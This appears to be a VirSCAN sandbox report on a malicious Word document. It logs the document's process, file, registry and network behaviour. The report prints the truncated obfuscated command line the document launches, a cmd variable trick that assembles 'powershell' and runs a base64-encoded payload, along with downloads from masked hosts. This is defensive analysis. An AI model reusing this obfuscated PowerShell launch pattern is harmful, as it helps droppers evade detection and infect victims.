VirSCAN

1. You can upload any file, but there is a 20 MB limit per file.
2. VirSCAN supports RAR/ZIP decompression, but the archive must contain fewer than 20 files.
3. VirSCAN can scan compressed files protected with the password 'infected' or 'virus'.

File information
Security score: 30
Basic information
MD5: 5f04521febc6fd82c896a192a3b2bf43
File type: Microsoft Office Word (doc) document
Vendor:
Version:
Packer or compiler information:
Key behaviors
Behavior description: Cross-process data write
Details: TargetProcess = C:\Windows\System32\cmd.exe, WriteAddress = 0x00050000, Size = 0x00000020 TargetPID = 0x00000ab8
TargetProcess = C:\Windows\System32\cmd.exe, WriteAddress = 0x00050020, Size = 0x00000034 TargetPID = 0x00000ab8
TargetProcess = C:\Windows\System32\cmd.exe, WriteAddress = 0x7ffdf238, Size = 0x00000004 TargetPID = 0x00000ab8
TargetProcess = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WriteAddress = 0x00050000, Size = 0x00000020 TargetPID = 0x00000adc
TargetProcess = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WriteAddress = 0x00050020, Size = 0x00000034 TargetPID = 0x00000adc
TargetProcess = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WriteAddress = 0x7ffdb238, Size = 0x00000004 TargetPID = 0x00000adc
Process behavior
Behavior description: Create process with hidden window
Details: ImagePath = , CmdLine = cmd /V /C "set %uihIioasd%=powers&&set %rGgiuGU%=hell&&!%uihIioasd%!!%rGgiuGU%! -e IAAuACAAKAAgACQAUwBIAGUAbABMAEkAZABbADEAXQArACQAcwBoAGUATABMAGkAZABbADEAMwBdACsAJwB4ACcAKQAgACgAWwBTAFQAcgBJAG4AZwBdADoAOgBKAG8AaQBuACgAJwAnACwAKAAoACAAMwA2ACAALAAxADEAOQAsADEA
Behavior description: Create process
Details: [0x00000ab8]ImagePath = C:\Windows\System32\cmd.exe, CmdLine = cmd /V /C "set %uihIioasd%=powers&&set %rGgiuGU%=hell&&!%uihIioasd%!!%rGgiuGU%! -e IAAuACAAKAAgACQAUwBIAGUAbABMAEkAZABbADEAXQArACQAcwBoAGUATABMAGkAZABbADEAMwBdACsAJwB4ACcAKQAgACgAWwBTAFQAcgBJAG4AZwBdADoAOgBKAG8AaQBuACgAJwAnACwAKAAoACAAMwA2ACAALAAxADEAOQAsADEA
[0x00000adc]ImagePath = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CmdLine = powershell -e IAAuACAAKAAgACQAUwBIAGUAbABMAEkAZABbADEAXQArACQAcwBoAGUATABMAGkAZABbADEAMwBdACsAJwB4ACcAKQAgACgAWwBTAFQAcgBJAG4AZwBdADoAOgBKAG8AaQBuACgAJwAnACwAKAAoACAAMwA2ACAALAAxADEAOQAsADEAMQA1ACwAIAA5ADkAIAAsACAAMQAxADQAIAAsADEAMAA1ACAALAAgADEAMQAyACAALAAg
Behavior description: Enumerate processes
Details: N/A
File behavior
Behavior description: Create file
Details: C:\Users\Administrator\AppData\Local\Temp\~DFF4B7AE57236D685D.TMP
C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\~$Normal.dot
C:\Users\Administrator\AppData\Local\Temp\~DFC6C3F38440D6A02B.TMP
C:\Users\Administrator\AppData\Local\%temp%\****.doc
C:\Users\Administrator\AppData\Local\Temp\~WRF0000.tmp
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\%temp%\****.LNK
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\%temp%.LNK
C:\Users\Administrator\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QS5RQGNN7P2QED83M4DB.temp
C:\Users\Administrator\AppData\Local\Temp\43951.exe
Behavior description: Search for file
Details: FileName = C:\Program Files\Common Files\Microsoft Shared\office11
FileName = C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll
FileName = C:\Program Files\Common Files\Microsoft Shared\office11\*.*
FileName = C:\Program Files
FileName = C:\Program Files\Microsoft Office
FileName = C:\Program Files\Microsoft Office\OFFICE11\Normal.dot
FileName = C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\Normal.dot
FileName = C:\Users\Administrator\AppData\Local\%temp%\****.doc
FileName = C:\Users\Administrator
FileName = C:\PROGRA~1
FileName = C:\PROGRA~1\COMMON~1
FileName = C:\PROGRA~1\COMMON~1\MICROS~1
FileName = C:\PROGRA~1\COMMON~1\MICROS~1\VBA
FileName = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6
FileName = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL
Behavior description: Delete file
Details: C:\Users\Administrator\AppData\Local\Temp\~DFF4B7AE57236D685D.TMP
C:\Users\Administrator\AppData\Local\Temp\~DFC6C3F38440D6A02B.TMP
C:\Users\Administrator\AppData\Local\Temp\43951.exe
Behavior description: Copy file
Details: C:\PROGRA~2\MICROS~1\OFFICE\DATA\OPA11.BAK ---> C:\PROGRA~2\MICROS~1\OFFICE\DATA\opa11.dat
Behavior description: Rename file
Details: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QS5RQGNN7P2QED83M4DB.temp ---> C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Behavior description: Modify file content
Details: C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\~$Normal.dot ---> Offset = 0
C:\Users\Administrator\AppData\Roaming\Microsoft\Templates\~$Normal.dot ---> Offset = 54
C:\Users\Administrator\AppData\Local\%temp%\****.doc ---> Offset = 0
C:\Users\Administrator\AppData\Local\%temp%\****.doc ---> Offset = 54
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\%temp%\****.LNK ---> Offset = 0
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\index.dat ---> Offset = 80
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\%temp%.LNK ---> Offset = 0
C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\index.dat ---> Offset = 40
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QS5RQGNN7P2QED83M4DB.temp ---> Offset = 0
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QS5RQGNN7P2QED83M4DB.temp ---> Offset = 4096
Network behavior
Behavior description: Establish a connection to a specified socket
Details: URL: ha****nl, IP: **.133.40.**:80, SOCKET = 0x00000570
URL: ex****za, IP: **.133.40.**:80, SOCKET = 0x00000598
URL: ja****hk, IP: **.133.40.**:80, SOCKET = 0x00000598
URL: ep****jp, IP: **.133.40.**:80, SOCKET = 0x00000598
URL: as****om, IP: **.133.40.**:80, SOCKET = 0x00000598
Behavior description: Send HTTP request
Details: GET /uQMrDsW/ HTTP/1.1 Host: ha****nl Connection: Keep-Alive
GET /NdFRZfSjL/ HTTP/1.1 Host: ex****za Connection: Keep-Alive
GET /Qen/ HTTP/1.1 Host: ja****hk Connection: Keep-Alive
GET /qwtoKLVhe/ HTTP/1.1 Host: ep****jp Connection: Keep-Alive
GET /DqrESMyO/ HTTP/1.1 Host: as****om Connection: Keep-Alive
Behavior description: Resolve host address by name
Details: GetAddrInfoW: ha****nl
GetAddrInfoW: ex****za
GetAddrInfoW: ja****hk
GetAddrInfoW: ep****jp
GetAddrInfoW: as****om
Registry behavior
Behavior description: Modify registry
Details: \REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\ 
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\MTTT
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\ !
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4080110900063D11C8EF10054038389C\Usage\WORDFiles
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4080110900063D11C8EF10054038389C\Usage\ProductFiles
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\E$
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4080110900063D11C8EF10054038389C\Usage\VBAFiles
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Common\ReviewCycle\ReviewToken
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\DocumentRecovery\22717\22717
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4080110900063D11C8EF10054038389C\Usage\WordEngWizDotFiles2
\REGISTRY\USER\S-*\Software\Microsoft\GDIPlus\FontCachePath
\REGISTRY\USER\S-*\Software\Microsoft\Office\Common\Assistant\CurrAsstState
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4080110900063D11C8EF10054038389C\Usage\SpellingAndGrammarFiles_1033
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing
Behavior description: Delete registry value
Details: \REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\ !
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\E$
\REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\ 
Behavior description: Delete registry key
Details: \REGISTRY\USER\S-*\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems\
Other behavior
Behavior description: Check whether it is being debugged
Details: IsDebuggerPresent
Behavior description: Create mutex
Details: Local\Mutex_MSOSharedMem
Local\Mso97SharedDg19211105606Mutex
Local\Mso97SharedDg20321105606Mutex
Global\MTX_MSO_Formal1_S-*
Global\MTX_MSO_AdHoc1_S-*
Local\Mso97SharedDg19521105606Mutex
Skd5yLHImeSCMutextCfgPersist_H_S-*
Local\Mso97SharedDg19531105606Mutex
_SHuassist.mtx
Local\SqmSysTray
OfficeAssistantStateMutex
RasPbFile
Global\.net clr networking
KYIMEShareCachedData.MutexObject.Administrator
KYTransactionServer.MutexObject.Administrator
Behavior description: Create event object
Details: EventName = PrimaryWord11Mutex
EventName = OleDfRootAE6B93CA3D8110BC
EventName = OleDfRootB919A15882F74E68
EventName = OleDfRoot4E8B4574DCBD7C93
EventName = Global\CorDBIPCSetupSyncEvent_2780
Behavior description: Window information
Details: Pid = 2460, Hwnd=0x401b2, Text = MsoDockTop, ClassName = MsoCommandBarDock.
Pid = 2460, Hwnd=0x501d4, Text = 格式, ClassName = MsoCommandBar.
Pid = 2460, Hwnd=0x40184, Text = 常用, ClassName = MsoCommandBar.
Pid = 2460, Hwnd=0x801d2, Text = 菜单栏, ClassName = MsoCommandBar.
Pid = 2460, Hwnd=0x90152, Text = b70c, ClassName = _WwB.
Pid = 2460, Hwnd=0x501e8, Text = MSO Generic Control Container, ClassName = MsoCommandBar.
Pid = 2460, Hwnd=0x50170, Text = MSO Generic Control Container, ClassName = MsoCommandBar.
Pid = 2460, Hwnd=0x501dc, Text = Microsoft Word 文档, ClassName = _WwG.
Pid = 2460, Hwnd=0xa015c, Text = b70c - Microsoft Word, ClassName = OpusApp.
Behavior description: Find specified window
Details: NtUserFindWindowEx: [Class,Window] = [MSOBALLOON,]
NtUserFindWindowEx: [Class,Window] = [MsoHelp10,]
NtUserFindWindowEx: [Class,Window] = [AgentAnim,]
NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,]
NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
Behavior description: Open event
Details: Local\MSCTF.CtfActivated.Default1
Local\MSCTF.AsmCacheReady.Default1
\KernelObjects\MaximumCommitCondition
MSFT.VSA.COM.DISABLE.2460
MSFT.VSA.IEC.STATUS.6c736db0
Global\TermSrvReadyEvent
Global\CLR_PerfMon_StartEnumEvent
\KernelObjects\LowMemoryCondition
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
MSFT.VSA.COM.DISABLE.2780
Global\SvcctrlStartEvent_A3752DX
Behavior description: Adjust process token privileges
Details: SE_DEBUG_PRIVILEGE
Behavior description: Enumerate windows
Details: N/A
Behavior description: Hide specified window
Details: [Window,Class] = [,_WwB]
Behavior description: Open mutex
Details: Local\Mutex_MSOSharedMem
Local\Mso97SharedDg19211105606Mutex
Local\Mso97SharedDg20321105606Mutex
Local\MU_ACBPIDS08
Local\MSCTF.Asm.MutexDefault1
Global\MTX_MSO_Formal1_S-*
Global\MTX_MSO_AdHoc1_S-*
Local\Mso97SharedDg19521105606Mutex
Local\Mso97SharedDg19531105606Mutex
Global\CLR_CASOFF_MUTEX
Local\SqmSysTray
OfficeAssistantStateMutex
RasPbFile
Global\.net clr networking
Behavior description: Import key
Details: [CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x001FE69C, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x0040FDAC, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x00447804, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x004478AC, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x015F8BA7, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x0040FDA4, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x040EA0D7, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x0040FD9C, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x00447B4C, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x03D04663, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x03D13783, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x00447D44, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x0043AA14, DataLen: 148, Flags: 0x00000000
[CryptImportKey] Algorithm: CALG_RSA_SIGN (0x00002400), Data: 0x00447F3C, DataLen: 148, Flags: 0x00000000
Runtime screenshot